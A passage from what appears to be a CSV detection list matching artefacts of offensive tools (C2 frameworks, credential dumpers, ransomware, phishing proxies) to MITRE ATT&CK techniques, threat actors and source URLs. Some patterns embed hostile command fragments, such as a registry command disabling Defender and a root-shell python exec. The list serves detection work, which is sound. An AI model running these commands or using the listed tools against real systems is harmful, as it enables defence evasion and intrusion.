external drive. 
as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12383" "*/utils/novnc_proxy*",".{0,1000}\/utils\/novnc_proxy.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","12384" "*/utils/obfuscate.py*",".{0,1000}\/utils\/obfuscate\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","12385" "*/utils/passwordfox.html*",".{0,1000}\/utils\/passwordfox\.html.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12386" 
"*/utils/vnc_password.html*",".{0,1000}\/utils\/vnc_password\.html.{0,1000}","offensive_tool_keyword","VNCPassView","recover the passwords stored by the VNC tool","T1003 - T1555 - T1081","TA0006 - TA0007","N/A","GoGoogle - 8BASE","Credential Access","https://www.nirsoft.net/utils/vnc_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12387" "*/UTWOqVQ132/*",".{0,1000}\/UTWOqVQ132\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - 
Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","12388" "*/UUID_bypass.py*",".{0,1000}\/UUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","12389" "*/v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","12391" "*/v1.0.0/moonwalk_linux*",".{0,1000}\/v1\.0\.0\/moonwalk_linux.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","12392" "*/vainject.c*",".{0,1000}\/vainject\.c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black 
Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12393" "*/vajra/phishApp.py*",".{0,1000}\/vajra\/phishApp\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","12394" "*/vanity.exe*",".{0,1000}\/vanity\.exe.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","1","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","12395" "*/Vanity_Dump.exe*",".{0,1000}\/Vanity_Dump\.exe.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","minidumpwritedump a RtlCreateProcessReflection copy of a targeted Windows process","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","1","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","12396" "*/var/lib/ptunnel*",".{0,1000}\/var\/lib\/ptunnel.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","#linux","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","12399" "*/var/lib/tor/*",".{0,1000}\/var\/lib\/tor\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. 
It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12400" "*/var/log/apache2/forensic_log-10080.log*",".{0,1000}\/var\/log\/apache2\/forensic_log\-10080\.log.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#linux","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","12402" "*/var/log/evilginx*",".{0,1000}\/var\/log\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","12404" "*/var/log/exegol/*.log*",".{0,1000}\/var\/log\/exegol\/.{0,1000}\.log.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","12405" "*/var/log/tor/*",".{0,1000}\/var\/log\/tor\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12410" "*/var/run/tor/control*",".{0,1000}\/var\/run\/tor\/control.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","12413" "*/var/run/tor/tor.pid*",".{0,1000}\/var\/run\/tor\/tor\.pid.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","12414" "*/var/tmp/.memory/diamorphine.c*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.c.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","12415" "*/var/tmp/.memory/diamorphine.h*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.h.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","12416" "*/var/tmp/.socket -p -c ""exec python3 -c \""import os;os.setuid(0);os.setgid(0);os.execl*",".{0,1000}\/var\/tmp\/\.socket\s\-p\s\-c\s\""exec\spython3\s\-c\s\\\""import\sos\;os\.setuid\(0\)\;os\.setgid\(0\)\;os\.execl.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","#linux","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","12417" "*/var/www/html/dynasty_rce*",".{0,1000}\/var\/www\/html\/dynasty_rce.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","12418" "*/var0xshell.git*",".{0,1000}\/var0xshell\.git.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","#linux","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","12419" "*/vas/fuzzers/fuzz/*",".{0,1000}\/vas\/fuzzers\/fuzz\/.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","12420" "*/vba_gen.py*",".{0,1000}\/vba_gen\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","12421" "*/VBad.git*",".{0,1000}\/VBad\.git.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. 
It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","12422" "*/vbarandomizer.py*",".{0,1000}\/vbarandomizer\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12423" "*/VDR.git*",".{0,1000}\/VDR\.git.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","12425" "*/VDR-main.zip",".{0,1000}\/VDR\-main\.zip","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","12426" "*/VectorKernel.git*",".{0,1000}\/VectorKernel\.git.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","12427" "*/veeam_dump.py*",".{0,1000}\/veeam_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the 
security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12428" "*/veeam-creds.git*",".{0,1000}\/veeam\-creds\.git.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","12429" "*/VeeamHax.exe",".{0,1000}\/VeeamHax\.exe","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","1","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","12430" "*/Vegile.git*",".{0,1000}\/Vegile\.git.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. 
There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","1","N/A","N/A","N/A","8","726","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z","12431" "*/Venom.git*",".{0,1000}\/Venom\.git.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12432" "*/venom.git*",".{0,1000}\/venom\.git.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","12433" "*/venom.sh *",".{0,1000}\/venom\.sh\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","#linux","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","12434" "*/Venom.v1.0.1.7z*",".{0,1000}\/Venom\.v1\.0\.1\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12435" "*/Venom.v1.0.2.7z*",".{0,1000}\/Venom\.v1\.0\.2\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense 
Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12436" "*/Venom.v1.0.7z*",".{0,1000}\/Venom\.v1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12437" "*/Venom.v1.1.0.7z*",".{0,1000}\/Venom\.v1\.1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12438" "*/Venom/tarball/v*",".{0,1000}\/Venom\/tarball\/v.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12439" "*/Venom/zipball/v*",".{0,1000}\/Venom\/zipball\/v.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12440" "*/venomoussway.py*",".{0,1000}\/venomoussway\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12441" "*/ventrilo-info.nse*",".{0,1000}\/ventrilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12442" "*/versant-info.nse*",".{0,1000}\/versant\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12443" "*/victim_info_key.py*",".{0,1000}\/victim_info_key\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","12444" "*/villain.py*",".{0,1000}villain\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","12447" "*/viper.py*",".{0,1000}\/viper\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","12448" "*/viper.sln*",".{0,1000}\/viper\.sln.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","12449" "*/viper/Docker/*",".{0,1000}\/viper\/Docker\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - 
T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","12450" "*/viper/Docker/nginxconfig/htpasswd*",".{0,1000}\/viper\/Docker\/nginxconfig\/htpasswd.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","#linux","N/A","10","","N/A","","","","12451" "*/vipermsf*",".{0,1000}\/vipermsf.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","1","N/A","N/A","N/A","N/A","12452" "*/viperpython*",".{0,1000}\/viperpython.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","#linux","N/A","10","","N/A","","","","12453" 
